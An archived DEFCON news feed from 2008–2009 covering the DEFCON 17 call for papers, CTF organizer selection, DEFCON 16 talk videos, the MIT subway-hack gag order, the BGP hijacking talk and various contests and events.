https://www.defcon.org/defconrss.xml The DEFCON website has been given a fresh new face, designed to deliver relevant content, inspire interaction within the community, and be more mobile friendly. We've released this beta to get feedback from you, the user, as we begin to flesh out the new features. Take a look around, on different browsers and devices, and if you like, report any bugs or voice suggestions to neil [at] defcon ]dot[ org. We're adding a few new items to the site, restructuring and expanding the archives section, and highlighting community news and events. Keep your eyes on the DEFCON RSS, Forums, Twitter, and/or LinkedIn Group for announcements as these features are completed and implemented.

==> The new DEFCON 17 CTF Organizers have spoken

https://www.defcon.org/defconrss.xml The newly chosen organizers of this year's CTF competition, Diutinus Defense Technologies, Inc., have broken their silence on the DEFCON Forums. You can view the post at https://forum.defcon.org/showthread.php?t=10246&page=3. They have also posted a website at http://www.ddtek.biz

==> And the new DEFCON 17 CTF Organizer is...

https://www.defcon.org/defconrss.xml The fine authors of Proposal #1 on the DEFCON 17 CTF Submissions Thread. We are not at liberty to divulge much more than this at this time, but you can read DT's announcement and keep your eyes peeled for new details at the aforementioned links!

==> Contest and Event Status for DEFCON 17

https://www.defcon.org/defconrss.xml It's going to be another great year of events and contests at DEFCON; the ideas are flying and some new players have emerged. A couple of new items for this year are DefCon 101: A Lurkers Guide to DefCon, and the DEFCON Geo Challenge. You can check out all of the latest contest and event info on the DEFCON 17 Official and Unofficial Events and Contests Forum.

==> DEFCON 17 CTF Proposals On the Forums!

https://www.defcon.org/defconrss.xml DT has sanitized and posted the CTF Proposal submissions on the DEFCON Forums at https://forum.defcon.org/showthread.php?t=10246 to be viewed and commented on by the community. Check them out and weigh in on which one you think should be chosen for 2009!

==> DEFCON 16 Audio now available!

https://www.defcon.org/defconrss.xml I've started to upload all the audio and video from DEFCON 16! This year we are offering something new, a combo video file that has both the slides as well as the video of the speaker on the same screen. These files are big! If you just want to listen to a talk I suggest downloading the m4b audio files. They are 1/2 the size of years past and will easily fit on your phone, about 5 to 10 megs each.

Audio files have finished uploading! https://www.defcon.org/podcast/defcon-16-audio.rss

Video of just the presentation slides with audio is uploading now and should take a day or so to be available; then the combo video files will be uploaded. Let the leeching begin! Report any problems on this forum thread.

The Dark Tangent

==> Submissions for CTF Organizers ends this weekend!

https://www.defcon.org/defconrss.xml Just a friendly reminder: if your group wants to set the bar, take the fame, and take on the massive challenge of being the next Capture the Flag Organizers for DEFCON, you must get your submissions in by this weekend! Good Luck! This thread on the DEFCON Forums has all the details!

==> DEFCON 17 Call For Papers is Open!

https://www.defcon.org/defconrss.xml DEF CON 17, Las Vegas 2009
July 31st - August 2nd
The Riviera Hotel and Casino
Las Vegas, Nevada, USA
https://www.defcon.org/

Call for Papers

Dark monks of techno-fu, it is that time of the year again! The DEFCON CFP is now open!

What: DEFCON 17 Call For Papers
When: The Call for Papers will close on May 15, 2009
How: Complete the Call for Papers Form and send to talks at defcon dot org

Don't know what DEFCON is? Go to www.defcon.org and clue up!

Papers and presentations are now being accepted for DEFCON 17, the conference your mother and ISC(2) warned you about. DEFCON will take place at the Riviera in Las Vegas, NV, USA, July 31 - August 2, 2009.

Two years ago we eliminated specific speaking tracks and we received a diverse selection of submissions, from hacking your car, your brain, and CIA sculptures to hacking the vote, Bluetooth, and DNS hacks. We will group presentations by subject and come up with topic clusters of interest. It worked out so well in the past that we are doing it again this year.

What are we looking for then, if we don't have tracks? We're looking for the presentation that you've never seen before and have always wanted to see. We are looking for the presentation that the attendees wouldn't ask for, but that blows their minds when they see it. We want strange demos of personal GPS jammers, RFID zappers, and HERF madness. Got a MITM attack against cell phones? We want to see it.

Subjects that we have traditionally covered in the past, and will continue to accept, include: Trojan development, worms, malware, intelligent agents, protocol exploits, application security, web security, database hacking, privacy issues, criminal law, civil law, international law/treaties, prosecution perspectives, 802.11X, Bluetooth, cellular telephony protocols, privacy, identity theft, identity creation, fraud, social implications of technology, media/film presentations, firmware hacking, hardware hacking, embedded systems hacking, smartcard technologies, credit card and financial instrument technologies, surveillance, counter-surveillance, UFOs, peer2peer technologies, reputation systems, copyright infringement and anti-copyright infringement enforcement technologies, critical infrastructure issues, physical security, social engineering, academic security research, PDA and cell phone security, EMP/HERF weaponry, TEMPEST technologies, corporate espionage, IDS evasion. What a mouthful! Well, you can't say we didn't give you some ideas. This list is not intended to limit possible topics, merely to give examples of topics that have interested us in the past, and is in fact the same list we used last year. Check out https://www.defcon.org/html/defcon-16/dc-16-speakers.html for past conference presentations to get a complete list of past topics that were accepted, if you want to learn from the past.

We are looking for and give preference to: unique research, new tool releases, 0-day attacks (with responsible disclosure), highly technical material, social commentaries, and ground breaking material of any kind. Want to screen a new hacking documentary or release research? Consider DEFCON.

Speaking Formats: Choose between 12 hundred seconds, 50 minutes, 110 minutes, 1/2 day Thursday, or a break out format of a length you determine.

We are continuing the Twelve Hundred Second Spotlight, which is a shorter presentation (about twenty minutes) for material that doesn't warrant a full 50 or 110 minute talk. The Twelve Hundred Second Spotlight is designed for those who don't have enough material for a full talk, but still have a valuable contribution to make. This is to ensure that great ideas that can be presented quickly don't fall through the cracks merely because they didn't justify a full length talk. Examples include research, announcements, group presentations, projects needing volunteers or testers, requests for comments, updates on previously given talks, and quick demonstrations. You get the idea. Presenters will get a speaker badge which entitles them to free admittance to DEFCON, but we will be unable to pay an honorarium.

Remember being attacked by Gran Master Ratt's Flame Crotch? Do you remember thick accented Germans trying to convince you to attack critical infrastructure? Do you remember extravagant vapor ware releases by a stage filled with posses? We do, and sans projectiles of raw meat we want to encourage such shenanigans again this year. We are calling on all "hacker groups" (you know who you are, and the FBI has a nifty file with your name on it) to present at DEFCON, to discuss what you're up to, what your mission is, to discuss any upcoming or past projects, and to discuss parties/conferences you are throwing. We do humbly request that all gang warfare be relegated to electronic attacks, and not fall over into meat space.

New for DEFCON 17: NEW this year is a 1/2 day set of tracks on Thursday, pre-con, to help orient newbies and provide 1/2 day training on different 'foundational' subjects such as networking, building custom Linux distros, a workshop on modding your PSP, the fundamentals of radio, things like that. These sessions will get you in the mood for the main conference and give you something to do if you showed up early Thursday. As such, your submissions for the Thursday sessions should be entertaining and help attendees who are fairly new get their feet under themselves, or give more advanced hacker types a half day of fun gutting their TiVo. If you want to present a 1/2 day training or newbie talk, just make sure you mark down that you want to present on Thursday.

We have ALL the speaking rooms this year, and because of this I want to announce a call for workshops, demos, and mini trainings. We have additional small rooms that will enable highly focused demonstrations or workshops. If you want to talk about building a passport cloner or give a tutorial on developing Metasploit exploits, this might be the format for you. You tell us how much time you need, and we try to accommodate you!

To submit a speech: Complete the DEFCON 17 Call for Papers Form. We are going to continue last year's goal of increasing the quality of the talks by screening people and topics. I realize you guys are speaking for basically free, but some talks are better than others. Some people put in a bit more effort than others. I want to reward the people who do the work by making sure there is room for them. This year we will have two rounds of speaker acceptance. In the first round we will fill about half of the schedule before the submission deadline, and the remaining half afterwards. This is to encourage people to submit as early as possible and allows attendees to plan on the topics that interest them. If you see the schedule on-line start to fill, do not worry if you have not heard from us yet, as we are still in the process of selection. Barring a disaster of monstrous proportions, speaker selection will be completed no later than July 1. The sooner you submit, the better the chance that the reviewers can give your presentation the full consideration it warrants. If you wait until the last minute to submit, you have less of a chance of being selected.

After a completed CFP form is received, speakers will be contacted if there are any questions about their presentations. If your talk is accepted you can continue to modify and evolve it up until the last minute, but don't deviate from your accepted presentation. We will mail you with information on deadlines for when we need your presentation, to be burnt on the CDROM, as well as information for the printed program.

Speakers get into the show free, get paid (AFTER they give a good presentation!), get a coolio badge, and people like you more. Heck, most people find it is a great way to meet people or find other people interested in their topics. Speakers can opt to forgo their payment and instead receive three human badges that they can give to their friends, sell to strangers, or hold onto as timeless mementoes. Receiving badges instead of checks has been a popular option for those insisting on maintaining their anonymity.

Please visit:
https://www.defcon.org/ for previous conference archives, information, and speeches. Updated announcements will be posted to news groups, security mailing lists and this web site.
https://forum.defcon.org/ for a look at all the events and contests being planned for DEFCON 17. Join in on the action.
https://pics.defcon.org/ to upload all your past DEFCON pictures. We store the pictures so you don't have to worry about web space. If you have an account on the forums, you have an account here.
https://www.defcon.org/defconrss.xml for news and announcements surrounding DEFCON.

CFP forms and questions should get mailed to: talks/at/defcon.org

==> Call for DEFCON 17 Capture the Flag Organizers!

https://www.defcon.org/defconrss.xml WANTED: An evil large multinational corporation, or... A nefarious group of genius autonomous hackers, or... A shadowy government organization from somewhere in the world
TO: Host, recreate, and innovate the world's most (in)famous hacking contest.
WHY: For everlasting fame, intrusive media interviews, the respect of your peers, or the envy of your enemies.

Do you have what it takes and know what we're talking about? Go to https://forum.defcon.org/showthread.php?t=10130 for all the details!

==> Call for Updates: Unofficial DEFCON FAQ

https://www.defcon.org/defconrss.xml From HighWiz on the DEFCON Blogs: The original "Unofficial DefCon FAQ" wasn't the work of one single individual but a collaboration by many people. I view my role as more of an organizer of the information rather than the creator of it. Version 1.0 (http://defcon.stotan.org/faq/) is seriously outdated and in need of a refresh. So I figured I'd utilize this blog space to request feedback on version 2.0. To find out more and how to contribute, go to https://forum.defcon.org/blog.php?b=101

==> DEFCON Forums Now SSL Only

https://www.defcon.org/defconrss.xml Due to overwhelmingly positive feedback, the DEFCON Forums are now strictly SSL. This change has enabled us to utilize page compression, which was previously unavailable and which speeds up page delivery. It will also enhance security, since all sessions will now be encrypted. If you haven't already joined the DEFCON Forums, you should; it's a great place to keep in touch with the DEFCON community and to be a part of the discussion and planning leading up to the next DEFCON! Check it out at: forum.defcon.org

==> Subway Hackers Now Working with MBTA

https://www.defcon.org/defconrss.xml Well, the dust has settled, and the lawsuit against three MIT students, who were to speak at DEFCON 16 about vulnerabilities in the Boston subway ticketing system, has been dropped. It seems now they will be working with the MBTA to help secure the ticketing systems. The researchers, who were federally gagged from speaking at DEFCON, were represented by the EFF, and the gag order was dropped shortly after con. You can read the EFF press release at http://www.eff.org/press/archives/2008/12/22, and there is an article on the PCWorld site at http://www.pcworld.com/article/155903/with_lawsuit_settled_hackers_now_working_with_mbta.html

==> Order DEFCON 16 Presentation DVDs From The Source of Knowledge

https://www.defcon.org/defconrss.xml If you didn't make it out to DEFCON 16, or just want to refresh on some of the great presentations we had this year, you can order full DVD copies of all of the talks from The Source of Knowledge (TSOK) website. TSOK's SynchVue DVD Format is new and improved, combining video and audio of the speaker, as well as slide material, in one! From the TSOK website: SynchVue DVD-ROM + SessionVue Audio. The SynchVue DVD-ROM is an incredible product which merges the live audio with the projected image. Whether it is a PowerPoint presentation, software demonstration, video or web page, all of it is captured and synchronized seamlessly with the audio from the presenter. Check it out at: https://www.sok-media.com/store/products.php?event=2008-DEFCON

==> Poll: Should DEFCON Forums go SSL Only?

https://www.defcon.org/defconrss.xml Get over to the DEFCON Forums and weigh in on whether or not they should only be accessible over an SSL connection. If you are a forums member, there is a handy poll in which you can vote. If you're not a member, SIGN UP! From DT on the DEFCON Forums: Hey everyone, I'd like everyone's input on switching forum.defcon.org over to SSL only. Brief background: The way we do redirection from http to https is a clever kludge Cot came up with, but it prevents us from using http compression, which would speed things up for everyone. Now that mobile devices have supported http compression for years we may as well take advantage of it, not to mention it would be like getting extra free capacity. With SSL only some of the XSS and related attacks would be more difficult and MITM concerns would almost vanish. The downside is some people might not be able to log in through proxies (I can over Tor, though), at free WiFi locations, etc. https://forum.defcon.org/showthread.php?t=9967

==> Defcon.org is Being Remodeled!

https://www.defcon.org/defconrss.xml It's all behind the scenes of course, but defcon.org is currently being re-worked a bit to enhance the community aspect of the site, refresh some of the older content, and become more mobile friendly. Keep an eye out over the next several weeks for changes and enhancements to the site!

==> Remaining DEFCON 16 Swag available at J!NX

https://www.defcon.org/defconrss.xml For those of you that couldn't make it to this year's DEFCON, or just didn't get a chance to stop by the Swag Booth, the remainder of this year's swag can now be purchased from J!NX. Check out the available styles at http://www.jinx.com/def_con?tcid=1, but hurry, sizes and styles are limited!

==> DEFCON Speakers in the News

https://www.defcon.org/defconrss.xml Tony Kapela, who blew minds by using flaws in BGP to intercept and re-route all of the DEFCON 16 network traffic, is the featured speaker at Black Hat's fourth free webcast. The webcast is entitled "Trust Doesn't Scale - Practical Hijacking on the World's Largest Network." It promises to be an interesting presentation. To find out more, go to https://www.blackhat.com/html/webinars/practicalhijacking.html. To register, you can go to http://w.on24.com/r.htm?e=115053&s=1&k=526FB59D2232E5EE4DF1A158DEA07277. The webcast will begin Thursday, October 16 at 1pm PST.

==> DEFCON Badge Designer Joe Grand's TV Show Premieres Wednesday Oct. 15!

https://www.defcon.org/defconrss.xml As many of you may know, the unique electronic badges for DEFCON (since DC14) are designed by the illustrious Joe "Kingpin" Grand. Formerly a member of the hacker group L0pht Heavy Industries and currently the brain behind Grand Idea Studios and The Kingpin Empire, Joe also has a new TV show called "Prototype This" premiering this Wednesday, October 15th on the Discovery Channel at 10pm eastern time. The premise: a team of four super smart guys with varying electronics and engineering backgrounds come up with and prototype crazy one-of-a-kind inventions on the cutting edge of technology in a limited time frame. It seems like this could be a great introduction for many into the world of hardware hacking and design. We're looking forward to seeing what they come up with!

Upcoming Episode List:
MIND CONTROLLED CAR - October 15 @ 10 e/p
BOXING ROBOTS - October 22 @ 10 e/p
TRAFFIC BUSTING TRUCK - October 29 @ 10 e/p
GET UP AND GO - November 5 @ 10 e/p
WATERSLIDE SIMULATOR - November 12 @ 10 e/p
SIX-LEGGED ALL TERRAIN VEHICLE - November 19 @ 10 e/p

Some links about the show:
http://dsc.discovery.com/tv/prototype-this/prototype-this.html - Discovery Channel Page for Prototype This
http://en.wikipedia.org/wiki/Prototype_This - Wikipedia Entry
http://news.cnet.com/8301-13772_3-10016485-52.html - CNet News Article

==> Early Release Video from DEFCON 16! Tool from talk released!

https://www.defcon.org/defconrss.xml We've decided to do an early release of a few of the news-making presentations from DEFCON 16 in video format! The following links are in two formats: the h.264 version is an iPod compatible version of the presenter's slides with audio of the speech, and the full .mov is QuickTime with dual video of the speaker and the slides. Enjoy, and keep your eye out for all the videos and audio from DEFCON 16 to be released in the next couple months!

Brenno De Winter - Ticket to Trouble
media.defcon.org/dc-16/video/dc16_dewinter_tickettotrouble/dc16_dewinter_tickettotrouble_full.mov
media.defcon.org/dc-16/video/dc16_dewinter_tickettotrouble/dc16_dewinter_tickettotrouble.m4v

Dan Kaminsky - DNS Goodness
media.defcon.org/dc-16/video/dc16_kaminsky/dc16_kaminsky_cache_full.mov
media.defcon.org/dc-16/video/dc16_kaminsky/dc16_kaminsky_cache.m4v

Anton Kapela and Alex Pilosov - Stealing the Internet
media.defcon.org/dc-16/video/dc16_kapela-pilosov_stealing/dc16_kapela-pilosov_full.mov
media.defcon.org/dc-16/video/dc16_kapela-pilosov_stealing/dc16_kapela-pilosov.m4v

Mike Perry - 365 Day: Active HTTPS Cookie Hijacking
media.defcon.org/dc-16/video/dc16_perry_TOR/dc16_perrry_TOR_full.mov
media.defcon.org/dc-16/video/dc16_perry_TOR/dc16_perrry_TOR.m4v

Coincidentally, Slashdot reports that Mike Perry has released the tool from this talk today. You can find the article here: http://it.slashdot.org/it/08/09/09/1558218.shtml

==> DEFCON 16 Press Page Updated

https://www.defcon.org/defconrss.xml There were many press-worthy happenings at DEFCON 16 this year, from the MBTA controversy to the new way of exploiting BGP. We've collected many of the articles for you to peruse on the Past Media Coverage page. You can check it out at https://www.defcon.org/html/links/dc_press/dc_press.html. If you've noticed an article directly related to DEFCON 16 we might have missed, send the url to neil ]at[ defcon {dot} org and we'll post it.

==> BGP exploit causing quite a stir

https://www.defcon.org/defconrss.xml Although it has been known for over a decade, an exploit of the Border Gateway Protocol (BGP) recently re-entered the spotlight at DEFCON 16 in a presentation by Anton Kapela and Alex Pilosov. The presentation is entitled "Stealing The Internet - A Routed, Wide-area, Man in the Middle Attack". You can read about the exploit on the Wired Threat Level blog at http://blog.wired.com/27bstroke6/2008/08/revealed-the-in.html and you can download the slides from the presentation at https://www.defcon.org/images/defcon-16/dc16-presentations/defcon-16-pilosov-kapela.pdf

==> DEFCON 16 Presentations now online!

https://www.defcon.org/defconrss.xml Lose your DEFCON 16 CD? Looking for updated presentation materials? Did you just miss DEFCON 16 altogether? You're in luck! The presentation slides and extras from the DEFCON 16 CD, including updated presentations we have received thus far can now be downloaded on the DEFCON Media Archives page. Go to https://www.defcon.org/html/links/defcon-media-archives.html for all the goodies!

==> First Interview since silenced subway hacking talk

https://www.defcon.org/defconrss.xml Popular Mechanics has interviewed Zack Anderson, one of the silenced MIT students who were to give the Anatomy of a Subway Hack talk at DEFCON 16. From Popular Mechanics: It's rare that a hacker convention makes national news, but three MIT students caused a whole lot of controversy when they planned a presentation about security holes in Boston's subway system for DefCon in Las Vegas earlier this month. They were forced to cancel the talk at the last minute by a 10-day federal restraining order, requested by Boston's Massachusetts Bay Transit Authority (MBTA). On Tuesday, a judge denied motions by the MBTA to issue a preliminary injunction aimed at keeping the students quiet for a further five months. Now, in his most extensive interview to date, MIT subway hacker Zack Anderson talks with PM about what's wrong with the Charlie Card, what happened at DefCon, and what it's like to tango with the FBI and the MBTA. Read more at: http://www.popularmechanics.com/technology/industry/4278892.html?page=1

==> MIT students gag order lifted!

https://www.defcon.org/defconrss.xml From CNET.com: BOSTON--The three Massachusetts Institute of Technology students who have been barred by a court order from discussing subway card vulnerabilities are now free to say what they want. In a ruling certain to be cheered by computer researchers, a federal judge here Tuesday let the 10-day-old gag order expire. U.S. District Judge George O'Toole Jr. refused to grant a preliminary injunction requested by the Massachusetts Bay Transportation Authority that would have blocked the students from talking about their findings until January 1, 2009. The MBTA's requested injunction would have replaced a temporary restraining order granted during the Defcon hacker conference, which under federal court rules automatically expires on Tuesday. Read more at: http://news.cnet.com/8301-1009_3-10020252-83.html?hhTest=1

==> Post DEFCON 16 items of note

https://www.defcon.org/defconrss.xml DEFCON 16 Receipt! For those of you that need a receipt for attending DEFCON 16, it can be downloaded from here: https://www.defcon.org/images/defcon-16/dc16_receipt.pdf Upload your Photos! Now that con has ended, get on over to pics.defcon.org and upload all of your awesome pics and videos from the show! We want to see them!

==> New Talk: Ticket to Trouble

https://www.defcon.org/defconrss.xml Brenno De Winter will be speaking Sunday on controversy surrounding hacks of the Belgian Subway system. The presentation will occur 13:00 to 13:50 in Track 3.

==> DEFCON 16 NEWS: MIT Students Gagged by Federal Court Judge

https://www.defcon.org/defconrss.xml The EFF announced today that they will represent 3 MIT students who were set to present at DEFCON 16 on mass transit vulnerabilities. The students were forced to cancel their presentation on Sunday, due to a Federal Court Judge's order. From eff.org: MIT Students Gagged by Federal Court Judge. EFF Backs Researchers Forced to Cancel Presentation on Transit Fare Payment System. Las Vegas - Three students at the Massachusetts Institute of Technology (MIT) were ordered this morning by a federal court judge to cancel their scheduled presentation about vulnerabilities in Boston's transit fare payment system, violating their First Amendment right to discuss their important research. (Read more at: http://www.eff.org/press/archives/2008/08/09) To see what other press is happening at DEFCON 16, check out the DEFCON in the news thread at https://forum.defcon.org/showthread.php?p=98012#post98012

==> DEFCON Updates

https://www.defcon.org/defconrss.xml DEFCON 16 Capture the Flag is Coming! In just a couple of days, the ultimate battle will begin at DEFCON 16. That's right, we're talking about the DEFCON Capture the Flag Competition organized by Kenshoto! Eight teams will unleash their best root-fu in the struggle for the coveted CTF Title! The following teams will be competing: 1@stPlace (returning champions), Routards, Pandas with Gambas, Guard@MyLan0, Shellphish, Taekwon-V, WOWHACKER, PLUS 4800. Head into the CTF Room in the Royale Pavilion to check out the action!
New Talk Added: Toying with Barcodes by Felix "FX" Lindner on Saturday at 17:00 in Track 1. Check it out at: https://www.defcon.org/html/defcon-16/dc-16-speakers.html#FX2

==> Don't Miss the TCP/IP Drinking Game!

https://www.defcon.org/defconrss.xml The annual must-see Defcon event of BGP, booze, and bemusement returns in this year's TCP/IP Drinking Game. Panelists will pit their knowledge of network trivia against one another and the ever-present haze of inebriation for all to see. We promise that no RFC nor hepatic system will be spared. As always, solid audience participation is encouraged, so bring well-researched queries.* This year's event will be hosted by Adam J. O'Donnell, security researcher and provocateur. The usual M.C. of the TCP/IP drinking game, Dr. Mudge, is spending this year sober for tax purposes... see you next year with my new bionic liver :) ..mudge
* Anyone asking about Windows 98 TCP/IP UIs will be promptly ejected.
Friday @ 20:00 in Speaking Track 4

==> Stay in the loop with the DEFCON 16 Twitter feed!

https://www.defcon.org/defconrss.xml The vehicle of choice this year for up to the minute updates of breaking DEFCON news, announcements and so forth will be the DEFCON 16 Twitter feed. Sign up now at http://twitter.com and follow user defcon16 to keep up to date with this year's DEFCON! See news breaking? Send events of note at DEFCON 16 to defconupdates {at} gmail ]dot[ com so we can tell the world!

==> New Happenings at DEFCON 16

https://www.defcon.org/defconrss.xml Well folks, the time for the 16th installment of the hacking convention known as DEFCON draws near, and this year promises to be a great one! We've got more content than ever, including 5 full tracks of talks, demos, workshops, new contests, a new Hardware Hacking Village, and even a new EFF fundraiser to replace the dunk tank! Here is some of the goodness you can expect:

DAVIX Visualization Workshop
At this "Bring Your Own Laptop" workshop we will introduce you to DAVIX. The workshop starts with an introduction to the set of available tools, the integrated manual, as well as customizing the CD to your needs. In a second part, you can use DAVIX to analyze a set of provided packet captures. In the end we will show some of the visualizations created by the participants. Be prepared for pretty and meaningful pictures! Get more info at: https://forum.defcon.org/forumdisplay.php?f=425

Mobile Hacker Spaces
Interested in visiting a Colorado Hacker Space here at DefCon 16? Check out the first ever Mobile Hacker Space, which will be parked in the outside chill out area during the convention. Try your hand against one of the challenges in the pentest lab, or learn from the web-based tutorials posted on the open network. Participation is encouraged, and presentations will be given every day from 2-4pm, which will provide a more hands-on look at how the Mobile Hacker Space operates and fits within published hacker space design patterns. Make sure you also attend the presentation on the history and design of the Colorado Springs Mobile Hacking Space on Sunday, at 1pm in Track One. Forums link: https://forum.defcon.org/forumdisplay.php?f=428

Quantum Spookshow
Quantum mechanics makes possible some things that are impossible in the "classical" world of ordinary experience, and which even seem to contradict common sense. Some of these spooky effects are coming into practical use in security applications. The Quantum Spookshow of the National Institute of Standards and Technology (NIST) and the National University of Singapore (NUS) demonstrates quantum cryptography and quantum entanglement on a four-node quantum network, which supports quantum encrypted streaming video and violations of local realism. Participants are encouraged to interact with the light beams that constitute the physical link of this network, and to meet physicists who have designed and built quantum networks. Quantum mechanics provides methods of encryption that are secure from eavesdropping attacks against the quantum channel, but in any actual system there are points of vulnerability, e.g. correlations of classical noise in the operation of quantum elements. Participants will have a chance to discover vulnerabilities by hands-on interaction with our systems. Hours: 10:00-18:00 on Friday and Saturday; Sunday closes around 16:00. Location: Room 114, directly across from the Contest area.

EFF Fundraiser
This year we decided to replace our beloved Dunk Tank with something NEW! Hackers and Guns in Las Vegas. Ya gotta love it. You've seen it played out numerous times in movies and on TV. A flash bang grenade goes off. SWAT kicks in the door and moves quickly to differentiate between the good guys and the bad guys in the same room. How do they train to effectively recognize and take out the bad guys, while not wasting any of the hostages? One of the tools they use is a Firearms Training Simulator, or FATS system, and someone was foolish enough to let us get our hands on one for DEFCON 16. So calling all Shooters, FPS Gamers, Psycho Killers, and 1337 wannabes: come on by and pop a cap in someone's VR bleep. We will be set up in room 115 across from the contest area and next door to the Quantum Spookshow from 10:00-20:00. See if you got the skillz to make it through the challenges unscathed. Then the next time you hear a knock at your door in the middle of the night, you'll be ready.
More at: https://forum.defcon.org/forumdisplay.php?f=427

==> WarBallooning Demo at DEFCON 16!

https://www.defcon.org/defconrss.xml A WarBalloon, er... Airborne Surveillance & 802.11 Stumbling Platform, also known as the "Kismet Eye in the Sky", will be flying just outside the DEFCON convention center on FRI and SAT from 11AM - 2PM. DEFCON Attendees: please note the Balloon & Electronics launch will occur daily at 11:00 AM & several times during the day as we change antennas & recon new targets. Read more at: https://forum.defcon.org/showthread.php?t=9613

==> The DEFCON Shoot is Back!

https://www.defcon.org/defconrss.xml From the DEFCON Shoot Page on Deviating.net: The DEFCON Shoot is a public event happening just prior to the DEFCON hacker conference in Las Vegas, Nevada. Anyone who wants to can show up and for a small fee make use of a private range located about 30 minutes outside of the city. There will be opportunities to see and possibly shoot some of the weapons belonging to your friends, and it will also be possible to rent firearms (including Class-III full autos) from the range itself. In addition to having a number of terrific pieces of hardware on-site, the range is directly affiliated with Small Arms Review Magazine and thus has access to their nearly limitless archive of equipment. Anything from a WWII Bren Gun to a Vulcan Cannon-style Minigun is possible. As of right now, the event's ability to come off is contingent on participation... that means that we need you if we're going to make it happen. I have run the numbers, and I can acquire us private range time at a very sweet facility if we have a little over two dozen people showing up, provided that at least ten of them are interested in some full-automatic action. Read on for more details about location, pricing, etc. You can sign up on the DEFCON Forums at https://forum.defcon.org/showthread.php?t=9574 You can get all the info at http://deviating.net/firearms/defcon_shoot/

==> DEFCON 16 Contest & Events Update!

https://www.defcon.org/defconrss.xml New DEFCON 16 Events/Contests: There are a few new happenings recently added to the mix that you might want to know about, such as the EEE PC Mod workshop, The Leetskills Talent Competition, as well as Buzzword Survivor, where you can win your share of $10k! Get all the up to the minute info at https://forum.defcon.org/forumdisplay.php?f=346!
DEFCON 16 Black & White Ball: Acts Announced. Get ready for some hot DJ action kids! Zziks has posted a tentative lineup for the Black & White bleep and Daytime Chillout Area. Check them out as they evolve on the Forums at https://forum.defcon.org/showthread.php?t=9533!

==> Mystery Box Wildcard Slot

https://www.defcon.org/defconrss.xml There will be one wildcard (walk-on) team allowed this year. Each year I have people asking about the contest after it is too late. This is my means of dealing with those people. Keep in mind that the first year Mystery Challenge ran, a walk-on team won the competition. Friday morning I will be accepting intentions to compete. THIS MAY CHANGE TO THURSDAY NIGHT. If only one team shows for this position, it is theirs. If multiple teams show, there will be a mini-challenge race to determine who gets the spot. Anyone who intends to try for the walk-on team should email me their intentions prior to con if possible (DC16MysteryChallenge [at] MysteryChallenge ]dot[ org). This will help me gauge the magnitude of the mini-challenge race, if necessary (and it just helps me get an idea of the number trying out). See you all in a few weeks. LosT

==> Seeking Contestants! Win your share of 10K!

https://www.defcon.org/defconrss.xml The wait is over. Buzzword Survivor is here. The rules are simple, the money is real.
Rules: You sit and listen to 36 hours of straight vendor pitches.
- No sleeping
- Eat what you want
- Bathroom breaks when you need them
- Stand and stretch when you need to, but you have to stay focused on the presenter.
Prize:
- 10 contestants
- Half the pot gets divided by all remaining contestants at the end.
- Half the pot gets divided 60/30/10 by 1st, 2nd, 3rd in test scores.
Prizes as of June 1, 2008 (assuming all 10 make it to the end). Pot could rise depending on number of sponsors.
- 1st: $3500
- 2nd: $1500
- 3rd: $750
- All others: $500
To become a contestant email: buzzwordsurvivor@gmail.com

==> Mystery Challenge registration closed

https://www.defcon.org/defconrss.xml Mystery Challenge registration is now closed. There will be 1 wildcard team allowed to sign up the first day of Defcon. Should multiple teams desire this position, there will be a mini-contest. Interested parties should email LosT with their intent to try for the wildcard slot.

==> DEFCON 16 Schedule now on-line!

https://www.defcon.org/defconrss.xml DEFCON 16 Schedule now on-line! We are proud to present the schedule of speakers and events for DEFCON 16! Thanks to all the new space available at the Riviera Hotel & Casino, we have even more room this year. 4 Full speaking tracks and an additional "Breakout" track filled with cool talks, demonstrations and workshops. We are pleased at our lineup, and the amazing list of speakers who really diversified the content this year. Link: http://defcon.org/html/defcon-16/dc-16-schedule.html Keep checking the website and schedule for changes, Contests & Event Schedules and Workshop room locations. This year is packed with more stuff to enjoy than any years prior and we hope you like it just as much as we do! See you at the show!

==> Mystery Challenge Reg Closing Sunday 6/29

https://www.defcon.org/defconrss.xml Mystery Challenge Registration will close this Sunday (6/29/08) at 11:59:59 PM. If you intend to register do it now. There should be sufficient information in the forums and on MysteryChallenge.org at this point. 1057

==> DEFCON Badge Hacking Contest!

https://www.defcon.org/defconrss.xml Recently announced at the DEFCON forums: The DEFCON Badge Hacking Contest awards the top 3 most ingenious, obscure, mischievous, obscene, or technologically astounding badge modifications created over the weekend. No longer just a boring piece of passive material, the badge is now a full-featured, active electronic product, and it exists for your hacking pleasure. We've had some amazing hacks in previous years. For info on the past badges and badge hacking contest entries, check out: http://www.grandideastudio.com/portf...fcon-15-badge/ and http://www.grandideastudio.com/portf...fcon-14-badge/ This is the first year that it will be an official contest announced in advance, etc., as previously we've kept the whole thing under wraps until the first day of the con. For more info go to https://forum.defcon.org/showthread.php?t=9502

==> People's Choice voting is open for the DC16 Artwork Contest!

https://www.defcon.org/defconrss.xml Let the voting commence! Go to the DEFCON 16 Artwork Contest Public Gallery at https://pics.defcon.org/showgallery.php?cat=532&ppuser=16770 to view this year's submissions. Once you have found your favorite go ahead and cast your vote at: https://forum.defcon.org/showthread.php?t=9497. Voting for the People's Choice category will run for one week, ending June 30th at 6pm. You will need a DEFCON Forums account to vote, so if you don't have one, sign up now at forum.defcon.org

==> Final round of DEFCON 16 Speakers chosen!

https://www.defcon.org/defconrss.xml This is it, Ladies and Germs, the last few DEFCON 16 speakers have been chosen and the talk schedule is now in its final stages. Look for the DEFCON 16 Schedule page to be updated this week at https://www.defcon.org/html/defcon-16/dc-16-schedule.html. For now, check out the speaker page and see what these latest selections are all about!
Grendel-Scan: A new web application scanning tool -- David Byrne, Eric Duprey
Comparison of File Infection on Windows & Linux -- Iclee_vx
Anti-RE Techniques in DRM Code -- Jan Newger
How can I pwn thee? Let me count the ways -- Renderman
Hijacking the Outdoor Digital Billboard Network -- Tottenkoph, Rev
You can discuss the speakers and talks on the DEFCON Forums at: https://forum.defcon.org/showthread.php?t=9496

==> DEFCONBots is Back!

https://www.defcon.org/defconrss.xml DefconBots is back this year with the same rules as last year. Now is a great time to get started on your bot! Last year there were six competitors; this year let's get a lot more! Don't let "I can't solder" stop you again, you can get started with a simple kit available through http://defconbots.org There's even open source software to get you started on Linux.

==> New DEFCON 16 Speakers Posted!

https://www.defcon.org/defconrss.xml 9 more talks have been added to the DEFCON 16 lineup, and are listed below, alpha by speaker:
Digital Security: a Risky Business -- Ian O. Angell
Pen-Testing is Dead, Long Live the Pen Test -- Taylor Banks
Hacking the Bionic Man -- Gadi Evron
